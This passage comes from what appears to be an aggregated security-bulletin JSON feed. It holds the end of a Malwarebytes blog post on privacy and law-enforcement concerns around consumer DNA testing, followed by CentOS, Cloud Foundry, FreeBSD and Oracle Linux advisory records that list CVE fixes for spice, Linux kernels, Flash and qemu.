randomized customer identification number for identification and customer support services, and genetic information is only identified using a barcode system.\n\nSecurity is baked into the design of the systems that gather, store, and disseminate data, including explicit security reviews in the software development lifecycle, quality assurance testing, and operational deployment. Security controls are also audited on a regular basis.\n\nAccess to the data is restricted to authorized personnel, based on job function and role, in order to reduce the likelihood of malicious insiders compromising or leaking the data. In addition, robust authentication controls, such as [multi-factor authentication](<https://blog.malwarebytes.com/101/2018/09/two-factor-authentication-2fa-secure-seems/>) and single sign-on, prohibit data flowing in and out like the tides.\n\nFor additional safety measures, consumer DNA testing companies conduct penetration testing and offer a bug bounty program to shore up vulnerabilities in their web application. Even more care has been taken with security training and awareness programs for employees, and incident management and response plans were developed with guidance from the National Institute of Standards and Technology (NIST).\n\nIn the words of the great John Hammond: They spared no expense.\n\nWhen Hunt made the call to Ancestry about the breach, he recalls that they responded quickly and professionally, unlike other organizations he's contacted about data leaks and breaches.\n\n\"There\u2019s always a range of ways organizations tend to deal with this. In some cases, they really don\u2019t want to know. They put up the shutters and stick their head in the sand. In some cases, they deny it, even if the data is right there in front of them.\"\n\nThankfully, that does not seem to be the case for the major DNA testing businesses.\n\n### Area of concern: law enforcement\n\nAt-home DNA testing kit companies are a little vague about when and under which conditions they would hand over your information to law enforcement, using terms such as \u201cunder certain circumstances\u201d and \u201cwe have to comply with valid requests\u201d without defining the circumstances or indicating what would be considered \u201cvalid.\u201d However, they do provide this [transparency report](<https://www.23andme.com/transparency-report/>) that details government requests for data and how they have responded.\n\nYet, news broke earlier this year that DNA from 23andMe was used to [find the Golden State Killer](<http://time.com/5299394/golden-state-killer-dna/>), and it gave consumers collective pause. While putting a serial killer behind bars is worthy cause, the killer was found because a relative of his had participated in 23andMe's test, and the DNA was a close enough match to DNA found at the original 1970's crime scenes that they were able to pin him down.\n\nThis opens up a can of worms about the impact of commercially-generated genetic data being available to law enforcement or other government bodies. How else could this data be used or even abused by police, investigators, or legislatures? The success of the Golden State Killer arrest could lead to re-opening other high-profile cold cases, or eventually turning to the consumer DNA databases every time there's DNA evidence found at the scene of a crime.\n\nBecause so many individuals have now signed up for commercial DNA tests, odds are [60 percent and rising](<o%09https:/arstechnica.com/science/2018/10/chances-dna-can-be-used-to-find-your-family-60-percent-and-rising>) that, if you live in the US and are of European descent, you can be identified by information that your relatives have made public. In fact, law enforcement soon may not need a family member to have submitted DNA in order to find matches. According to a [study published in _Science_](<https://www.scientificamerican.com/article/how-to-identify-almost-anyone-in-a-consumer-gene-database/>), that figure will soon rise to 100 percent as consumer DNA databases reach critical mass.\n\nWhat\u2019s the big deal if DNA is used to capture criminals, though? Putting on my tinfoil hat for a second, I imagine a _Minority-Report_-esque scenario of stopping future crimes or misinterpreting DNA and imprisoning the wrong person. While those scenarios are a little far-fetched, I didn\u2019t have to look too hard for real-life instances of abuse.\n\nIn July 2018, Vice reported that [Canada\u2019s border agency was using data from Ancestry.com and Familytreedna.com](<https://news.vice.com/amp/en_ca/article/wjkxmy/canada-is-using-ancestry-dna-websites-to-help-it-deport-people>) to establish nationalities of migrants and deport those it found suspect. In an era of high tensions on race, nationality, and immigration, it\u2019s not hard to see how genetic data could be used against an individual or family for any number of civil or human rights violations.\n\n### Area of concern: accuracy of testing results\n\nWhile this doesn\u2019t technically fall under the guise of cybersecurity, the accuracy of test results is of concern because these companies are doling out incredibly sensitive information that has the potential to levy dramatic change on peoples\u2019 lives. A [March 2018 study in _Nature_](<https://www.nature.com/articles/gim201838>) found that 40 percent of results from at-home DNA testing kits were false positives, meaning someone was deemed \u201cat risk\u201d for a category that later turned out to be benign. That statistic is validated by the fact that test results from different consumer testing companies [can vary dramatically](<https://www.seattletimes.com/seattle-news/reporters-dna-ancestry-tests-caught-me-off-guard/>).\n\nThe relative inaccuracy of the test results is compounded by the fact that there\u2019s a lot of room to misinterpret them. Whether it\u2019s learning you\u2019re high risk for Alzheimer\u2019s or discovering that your father is not really your father, health and ancestry data can be consumed without context, and with no doctor or genetic counselor on hand to soften the blow.\n\nIn fact, consumer DNA testing companies are rather reticent to send their users to genetic counselors\u2014it\u2019s essentially antithetical to their mission, which is to make genetic data more accessible to their customers.\n\nBrianne Kirkpatrick, a genetic counselor and ancestry expert with the National Society for Genetic Counselors (NSGC), said that 23andMe once had a fairly prominent link on their website for finding genetic counselors to help users understand their results. That link is now either buried or gone. In addition, she mentioned that a one of her clients had to call 23andMe three times until they finally agreed to recommend Kirkpatrick's counseling services.\n\n\u201cThe biggest drawback is people believing that they understand the results when maybe they don\u2019t,\u201d she said. \u201cFor example, people don\u2019t understand that the BRCA1 and BRCA2 testing these companies provide is really only helpful if you\u2019re Ashkenazi Jew. In the fine print, it says they look at three variants out of thousands, and these three are only for this population. But people rush to make a conclusion because at a high level it looks like they should be either relieved or worried. It\u2019s complex information, which is why genetic counselors exist in the first place.\u201d\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/11/genetic_risk-600x388.png)\n\nBut what's the symbology?\n\nThe data becomes even more messy when you move beyond users of European descent. People of color, especially those of Asian or African descent, [have had a particularly hard go of it](<https://qz.com/765879/23andme-has-a-race-problem-when-it-comes-to-ancestry-reports-for-non-whites/>) because they are underrepresented in many companies\u2019 data sets. Often, black, Hispanic, or Asian users receive reports that list parts of their heritage as \u201clow confidence\u201d because their DNA doesn\u2019t sufficiently match the company\u2019s points of reference.\n\nDNA testing companies not only offer sometimes incomplete, inaccurate information that\u2019s easy to misunderstand to their customers, they also provide the raw data output that can be downloaded and then sent to [third party websites](<https://www.reddit.com/r/23andme/comments/81zyjp/list_of_sites_for_raw_data/>) for even more evaluation. But those sites have not been as historically well-protected as the major consumer DNA testing companies. Once again, the security and privacy of genetic data goes fluttering away into the ether when users upload it, unencrypted and unprotected, to third-party platforms.\n\n### Doing it right: privacy policy\n\nAs an emerging industry, there\u2019s little in the way of regulation or public policy when it comes to consumer genetic testing. Laboratory testing is bound by Medicare and Medicaid clauses, and commercial companies are regulated by the FDA, but DNA testing companies are a little of both, with the added complexity of operating online. The [General Data Protection Regulation (GDPR)](<https://iapp.org/news/a/how-gdpr-changes-the-rules-for-research/>) launched in May 2018 requires companies to publicly disclose whether they\u2019ve experienced a cyberattack, and imposes heavy fines for those who are not in compliance. But GDPR only applies to companies doing business in Europe.\n\nAs far as legal precedent is concerned, the 1990 California Supreme Court case [Moore vs. Regents of the University of California](<https://en.wikipedia.org/wiki/Moore_v._Regents_of_the_University_of_California>) found that individuals no longer have claim over their genetic data once they relinquish it for medical testing or other forms of study. So if Ancestry sells your DNA to a pharmaceutical company that then uses your cells to find the cure for cancer, you won\u2019t see a dime of compensation. Bummer.\n\nDespite the many opportunities for data to be stolen, abused, misunderstood, and sold to the highest bidder, the law simply hasn\u2019t caught up to our technology. So the teams developing security and privacy policies for DNA testing companies are doing pioneering work, embracing security best practices and transparency at every turn. This is the right thing to do.\n\nAlmost two years ago, founders at Helix started working with privacy experts in order to understand all the key pieces they would need to safeguard\u2014and they recognized that there was a need to form a formal coalition to enhance collaboration across the industry.\n\nThrough the Future of Privacy forum, they developed an independent think tank focused on creating public policy that leaders in the industry could follow. They teamed up with representatives from 23andMe, Ancestry, and others to create [a set of standards](<https://www.23andme.com/about/privacy/>) that primarily hammered on the importance of transparency and clear communication with consumers.\n\n\u201cIt is something that we are very passionate about,\u201d said Misha Rashkin, Senior Genetic Counselor at Helix, and an active member of developing the shared privacy policy. \u201cWe\u2019ve spent our careers explaining genetics to people, so there\u2019s a years-long held belief that transparent, appropriate education\u2014meaning developing policy at an approachable reading level\u2014has got to be a cornerstone of people interacting with their DNA.\u201d\n\nWhile the privacy coalition strived for easy-to-understand language, the fact remains that their privacy policy is a 21-page document that most people are going to ignore. Rashkin and other team members were aware, so they built more touch points for customers to drill into the data and provide consent, including in-product notifications, emails, blog posts, and infographics delivered to customers as they continued to interact with their data on the platform.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/11/mid-atlantic-settlers-600x293.png)\n\nMaps, diagrams, charts, and other visuals help users better understand their data.\n\nAfter Rashkin and company finalized and published their privacy policy, they turned it into a checklist that partners could use to determine baseline security and privacy standards, and what companies need to do to be compliant. But the work won\u2019t stop there.\n\n\u201cThis is just the beginning,\u201d said Elissa Levin Senior Director of Clinical Affairs and Policy at Helix, and a founding member of the privacy policy coalition. \u201cAs the industry evolves, we are planning on continuing to work on these standards and progress them. And then we're actually going out to educate policy makers and regulators and the public in general. We want to help them determine what these policies are and differentiate who are the good players and who are the not-so-good players.\u201d\n\n### Biggest area of concern: the unknown\n\nWe just don't know what we don't know when it comes to technology. When Mark Zuckerberg invented Facebook, he merely wanted an easy way to look at pretty college girls. I don't think it entered his wildest dreams that his company's platform could be used to directly interfere with a presidential election, or lead to the genocide of citizens in Myanmar. But because of a lack of foresight and an inability to move quickly to right the ship, we're now all [mired in the mud](<https://blog.malwarebytes.com/cybercrime/2018/09/millions-of-accounts-affected-in-latest-facebook-hack/>).\n\nRight now, cybercriminals aren't searching for DNA on the black market, but that doesn't mean they won't. Cybercrime often follows the path of least resistance\u2014what takes the least amount of effort for the biggest payoff? That's why social engineering attacks still vastly outnumber traditional malware infection vectors.\n\nBecause of that, cybercriminals likely believe it's not worth jumping through hoops to try and break serious encryption for a product (genetic data) that's not in demand\u2014yet. But as biometrics and fingerprinting and other biological modes of authentication become more popular, I imagine it's only a matter of time before the wagons start circling.\n\nAnd yet\u2014does it even matter? Even with all of the red flags exposed, millions of customers have taken the leap of faith because their curiosity overpowers their fear, or the immediate gratification is more satisfying than the nebulous, vague \u201cwhat ifs\u201d that we in the security community haven\u2019t solved for. With so much data publicly available, do people even care about privacy anymore?\n\n\u201cThere are changing sentiments about personal data among generations,\u201d said Hunt. \u201cThere\u2019s this entire generation who has grown up sharing their whole world online. This is their new social norm. We\u2019re normalizing the collection of this information. I think if we were to say it\u2019s a bad thing, we\u2019d be projecting our more privacy-conscience viewpoints on them.\u201d\n\nOthers believe that, regardless of personal feelings on privacy, this technology isn't going away, so we\u2014security experts, consumers, policy makers, and genetic testers alike\u2014need to address its complex security and privacy issues head on.\n\n\"Privacy is such a personal matter. And while there may be trends, that doesn\u2019t necessarily speak to an entire generation. There are people who are more open and there are people who are more concerned,\" said Levin. \"Whether someone is concerned or not, we are going to set these standards and abide by these practices because we think it\u2019s important to protect people, even if they don\u2019t think it\u2019s critical. Fundamentally, it does come down to being transparent and helping people be aware of the risk to at least mitigate surprises.\"\n\nIndeed, whether privacy is personally important to you or not, understanding which data is being collected from where and how companies benefit from using your data makes you a more well-informed consumer.\n\nDon\u2019t just check that box. Look deeper, ask questions, and do some self-reflection about what\u2019s important to you. Because right now, if someone steals your data, you might have to change a few passwords or cancel a couple credit cards. You might even be embroiled in [identity theft hell](<https://blog.malwarebytes.com/101/2017/09/equifax-aftermath-how-to-protect-against-identity-theft/>). But we have no idea what the consequences will be if someone steals your genetic code.\n\nLaws change and society changes. What\u2019s legal and sanctioned now may not be in the future. But that data is going to be around a long time. And you cannot change your DNA.\n\nThe post [What DNA testing kit companies are really doing with your data](<https://blog.malwarebytes.com/101/2018/11/dna-testing-kit-companies-really-data/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Wendy Zamora", "published": "2018-11-20T15:00:00", "type": "malwarebytes", "title": "What DNA testing kit companies are really doing with your data", "enchantments": {"score": {"modified": "2018-11-20T22:54:43", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-11-20T15:00:00", "id": "MALWAREBYTES:52A838CF2BFA41F817348C233420B269", "href": "https://blog.malwarebytes.com/101/2018/11/dna-testing-kit-companies-really-data/", "cvss": {"score": 0.0, "vector": "NONE"}}], "centos": [{"lastseen": "2018-11-21T00:26:07", "references": ["https://access.redhat.com/errata/RHSA-2018:3522"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "0.12.4-16.el6_10.2", "arch": "any", "packageFilename": "spice-server-0.12.4-16.el6_10.2.src.rpm", "packageName": "spice-server", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "0.12.4-16.el6_10.2", "arch": "x86_64", "packageFilename": "spice-server-devel-0.12.4-16.el6_10.2.x86_64.rpm", "packageName": "spice-server-devel", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "0.12.4-16.el6_10.2", "arch": "x86_64", "packageFilename": "spice-server-0.12.4-16.el6_10.2.x86_64.rpm", "packageName": "spice-server", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2018:3522\n\n\nThe Simple Protocol for Independent Computing Environments (SPICE) is a remote display protocol for virtual environments. SPICE users can access a virtualized desktop or server from the local system or any system with network access to the server. SPICE is used in Red Hat Enterprise Linux for viewing virtualized guests running on the Kernel-based Virtual Machine (KVM) hypervisor or on Red Hat Enterprise Virtualization Hypervisors.\n\nSecurity Fix(es):\n\n* spice: Possible buffer overflow via invalid monitor configurations (CVE-2017-7506)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nThis issue was discovered by Frediano Ziglio (Red Hat).\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-November/023080.html\n\n**Affected packages:**\nspice-server\nspice-server-devel\n\n**Upstream details at:**\n", "edition": 1, "reporter": "CentOS Project", "published": "2018-11-20T14:49:17", "title": "spice security update", "type": "centos", "enchantments": {"score": {"modified": "2018-11-21T00:26:07", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7506"], "modified": "2018-11-20T14:49:17", "id": "CESA-2018:3522", "href": "http://lists.centos.org/pipermail/centos-announce/2018-November/023080.html", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cloudfoundry": [{"lastseen": "2018-11-20T22:01:25", "references": [], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 16.04\n\n# Description\n\nUSN-3820-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nFelix Wilhelm discovered that the Xen netback driver in the Linux kernel did not properly perform input validation in some situations. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-15471)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nIt was discovered that an integer overflow existed in the CD-ROM driver of the Linux kernel. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2018-16658)\n\nIt was discovered that an integer overflow existed in the HID Bluetooth implementation in the Linux kernel that could lead to a buffer overwrite. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-9363)\n\nCVEs contained in this USN include: CVE-2017-13168, CVE-2018-16658, CVE-2018-9363, CVE-2018-15471\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 170.x versions prior to 170.6\n * 97.x versions prior to 97.33\n * All other stemcells not listed.\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 170.x versions to 170.6\n * Upgrade 97.x versions to 97.33\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n\n# References\n\n * [USN-3820-2](<https://usn.ubuntu.com/3820-2>)\n * [CVE-2017-13168](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13168>)\n * [CVE-2018-16658](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16658>)\n * [CVE-2018-9363](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-9363>)\n * [CVE-2018-15471](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-15471>)\n", "edition": 1, "reporter": "Cloud Foundry", "published": "2018-11-20T00:00:00", "title": "USN-3820-2: Linux kernel (HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"modified": "2018-11-20T22:01:25", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2018-9363", "CVE-2018-15471", "CVE-2018-16658", "CVE-2017-13168"], "modified": "2018-11-20T00:00:00", "id": "CFOUNDRY:292CE3FF25BE7F67EFA36C82DF2DFC90", "href": "https://www.cloudfoundry.org/blog/usn-3820-2/", "cvss": {"score": 6.8, "vector": "AV:LOCAL/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-20T22:01:41", "references": [], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3821-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly ensure that xattr information remained in inode bodies. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10880)\n\nIt was discovered that the alarmtimer implementation in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the f2fs filesystem implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious f2fs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13096)\n\nWen Xu and Po-Ning Tseng discovered that the btrfs filesystem implementation in the Linux kernel did not properly handle relocations in some situations. An attacker could use this to construct a malicious btrfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux kernel did not properly handle malformed catalog data in some situations. An attacker could use this to construct a malicious HFS+ image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nJann Horn discovered that the procfs file system implementation in the Linux kernel did not properly restrict the ability to inspect the kernel stack of an arbitrary task. A local attacker could use this to expose sensitive information. (CVE-2018-17972)\n\nIt was discovered that the KVM implementation in the Linux kernel on ARM 64bit processors did not properly handle some ioctls. An attacker with the privilege to create KVM-based virtual machines could use this to cause a denial of service (host system crash) or execute arbitrary code in the host. (CVE-2018-18021)\n\nCVEs contained in this USN include: CVE-2018-10880, CVE-2018-13053, CVE-2018-13096, CVE-2018-14609, CVE-2018-14617, CVE-2018-17972, CVE-2018-18021\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3586.x versions prior to 3586.56\n * 3541.x versions prior to 3541.60\n * 3468.x versions prior to 3468.86\n * 3445.x versions prior to 3445.82\n * 3421.x versions prior to 3421.99\n * All other stemcells not listed.\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3586.x versions to 3586.56\n * Upgrade 3541.x versions to 3541.60\n * Upgrade 3468.x versions to 3468.86\n * Upgrade 3445.x versions to 3445.82\n * Upgrade 3421.x versions to 3421.99\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3821-2](<https://usn.ubuntu.com/3821-2>)\n * [CVE-2018-10880](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10880>)\n * [CVE-2018-13053](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13053>)\n * [CVE-2018-13096](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13096>)\n * [CVE-2018-14609](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14609>)\n * [CVE-2018-14617](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14617>)\n * [CVE-2018-17972](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-17972>)\n * [CVE-2018-18021](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18021>)\n", "edition": 1, "reporter": "Cloud Foundry", "published": "2018-11-20T00:00:00", "title": "USN-3821-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"modified": "2018-11-20T22:01:41", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-10880", "CVE-2018-13096", "CVE-2018-18021", "CVE-2018-14617", "CVE-2018-17972"], "modified": "2018-11-20T00:00:00", "id": "CFOUNDRY:8CFC2758BB5A33EFE62E28CBCF6F0C0C", "href": "https://www.cloudfoundry.org/blog/usn-3821-2/", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-11-20T22:56:09", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb18-44.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "31.0.0.153", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-flashplayer", "operator": "lt"}], "description": "\nAdobe reports:\n\n\nThis update resolves a type confusion vulnerability that\n\t could lead to arbitrary code execution (CVE-2018-15981).\n\n\n", "edition": 1, "reporter": "FreeBSD", "published": "2018-11-20T00:00:00", "title": "Flash Player -- arbitrary code execution", "type": "freebsd", "enchantments": {"score": {"modified": "2018-11-20T22:56:09", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-15981"], "modified": "2018-11-20T00:00:00", "id": "8F128C72-ECF9-11E8-AA00-6451062F0F7A", "href": "https://vuxml.freebsd.org/freebsd/8f128c72-ecf9-11e8-aa00-6451062f0f7a.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2018-11-21T03:01:50", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "src", "packageFilename": "qemu-3.0.0-1.el7.src.rpm", "packageName": "qemu", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "src", "packageFilename": "qemu-3.0.0-1.el7.src.rpm", "packageName": "qemu", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-img-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu-img", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-kvm-core-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu-kvm-core", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-block-iscsi-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-block-iscsi", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-system-aarch64-core-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-system-aarch64-core", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-img-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-img", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-block-gluster-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu-block-gluster", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "ivshmem-tools-3.0.0-1.el7.aarch64.rpm", "packageName": "ivshmem-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-kvm-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu-kvm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-system-aarch64-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-system-aarch64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-kvm-core-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-kvm-core", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-block-rbd-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-block-rbd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-common-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-block-iscsi-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu-block-iscsi", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-block-rbd-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu-block-rbd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-kvm-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-kvm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "x86_64", "packageFilename": "qemu-common-3.0.0-1.el7.x86_64.rpm", "packageName": "qemu-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.0.0-1.el7", "arch": "aarch64", "packageFilename": "qemu-block-gluster-3.0.0-1.el7.aarch64.rpm", "packageName": "qemu-block-gluster", "operator": "lt"}], "description": "[15:3.0.0-1.el7]\n- net: ignore packet size greater than INT_MAX (Jason Wang) [Orabug: 28763782] {CVE-2018-17963}\n- pcnet: fix possible buffer overflow (Jason Wang) [Orabug: 28763774] {CVE-2018-17962}\n- rtl8139: fix possible out of bound access (Jason Wang) [Orabug: 28763765] {CVE-2018-17958}\n- ne2000: fix possible out of bound access in ne2000_receive (Jason Wang) [Orabug: 28763758] {CVE-2018-10839}\n- seccomp: set the seccomp filter to all threads (Marc-Andre Lureau) [Orabug: 28763748] {CVE-2018-15746}\n- virtio_net: Introduce VIRTIO_NET_F_STANDBY feature bit to virtio_net (Sridhar Samudrala) [Orabug: 28763724]\n- kvm: add call to qemu_add_opts() for -overcommit option (Prasad Singamsetty) \n- Document various CVEs as fixed (Mark Kanda) [Orabug: 28763710] {CVE-2017-10806} {CVE-2017-11334} {CVE-2017-12809} {CVE-2017-13672} {CVE-2017-13673} {CVE-2017-13711} {CVE-2017-14167} {CVE-2017-15038} {CVE-2017-15119} {CVE-2017-15124} {CVE-2017-15268} {CVE-2017-15289} {CVE-2017-16845} {CVE-2017-17381} {CVE-2017-18030} {CVE-2017-18043} {CVE-2017-2630} {CVE-2017-2633} {CVE-2017-5715} {CVE-2017-5753} {CVE-2017-5754} {CVE-2017-7471} {CVE-2017-7493} {CVE-2017-8112} {CVE-2017-8309} {CVE-2017-8379} {CVE-2017-8380} {CVE-2017-9503} {CVE-2018-11806} {CVE-2018-12617} {CVE-2018-3639} {CVE-2018-5683} {CVE-2018-7550} {CVE-2018-7858}\n- qemu.spec: Initial qemu.spec (Mark Kanda) \n- virtio-pci: Set subsystem vendor ID to Oracle (Mark Kanda) \n- qemu_regdump.py: Initial qemu_regdump.py (Mark Kanda) \n- qmp-regdump: Initial qmp-regdump (Mark Kanda) \n- bridge.conf: Initial bridge.conf (Mark Kanda) \n- kvm.conf: Initial kvm.conf (Mark Kanda) \n- 80-kvm.rules: Initial 80-kvm.rules (Mark Kanda) \n- Update version for v3.0.0 release (Peter Maydell) \n- Update version for v3.0.0-rc4 release (Peter Maydell) \n- virtio-gpu: fix crashes upon warm reboot with vga mode (Marc-Andre Lureau) \n- slirp: Correct size check in m_inc() (Peter Maydell) \n- target/xtensa/cpu: Set owner of memory region in xtensa_cpu_initfn (Thomas Huth) \n- hw/intc/arm_gicv3_common: Move gicd shift bug handling to gicv3_post_load (Peter Maydell) \n- hw/intc/arm_gicv3_common: Move post_load hooks to top-level VMSD (Peter Maydell) \n- target/arm: Add dummy needed functions to M profile vmstate subsections (Peter Maydell) \n- hw/intc/arm_gicv3_common: Combine duplicate .subsections in vmstate_gicv3_cpu (Peter Maydell) \n- 